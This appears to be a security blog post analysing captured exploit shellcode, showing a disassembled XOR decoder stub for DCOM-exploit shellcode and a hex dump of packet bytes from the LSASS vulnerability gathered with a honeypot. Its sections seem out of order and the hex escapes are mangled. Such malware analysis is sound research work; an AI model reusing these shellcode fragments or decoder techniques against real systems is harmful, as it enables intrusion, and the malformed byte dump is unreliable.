Virus Blog

In this second part we will take a closer look at a more complex and encoded shellcode. This time i received it by emulating the DCOM vulnerability. As the shellcode is encoded we need to find the decoder part first. It usually starts right after the NOP lines.

000004BB 90 nop
000004BC 90 nop
000004BD 90 nop
000004BE 90 nop
000004BF 90 nop
000004C0 90 nop
000004C1 90 nop
000004C2 90 nop
000004C3 90 nop
000004C4 90 nop
000004C5 90 nop
000004C6 EB10 jmp short 0x4d8
000004C8 5A pop edx
000004C9 4A dec edx
000004CA 33C9 xor ecx,ecx
000004CC 66B97601 mov cx,0x176
000004D0 80340A99 xor byte [edx+ecx],0x99
000004D4 E2FA loop 0x4d0
000004D6 EB05 jmp short 0x4dd
000004D8 E8EBFFFFFF call 0x4c8
000004DD 7061 jo 0x540

I have been playing around with different kinds of shellcode for the last couple of days. I received my first piece of shellcode by simulating the famous LSASS vulnerability on a Linux host. The vulnerability comprises a total of six steps until the final shellcode is transmitted, containing information about where to download the additional malware. More details about the vulnerability can be found all around the web or at nepenthes, a low-interaction honeypot for capturing malware binaries.

However, once the shellcode is received one can start taking a closer look at it. The hexadecimal output looks something like this:

"x00x00x00x9cxffx53x4dx42x25x00x00x00x00x18x07xc8"
"x00x00x00x00x00x00x00x00x00x00x00x00x00x08xdcx04"
"x00x08x50x00x10x00x00x48x00x00x00x00x04x00x00x00"
"x00x00x00x00x00x00x00x00x00x54x00x48x00x54x00x02"
"x00x26x00x00x40x59x00x10x5cx00x50x00x49x00x50x00"
"x45x00x5cx00x00x00x00x00x05x00x0bx03x10x00x00x00"
"x48x00x00x00x01x00x00x00xb8x10xb8x10x00x00x00x00"
"x01x00x00x00x00x00x01x00x6ax28x19x39x0cxb1xd0x11"
"x9bxa8x00xc0x4fxd9x2exf5x00x00x00x00x04x5dx88x8a"
"xebx1cxc9x11x9fxe8x08x00x2bx10x48x60x02x00x00x00"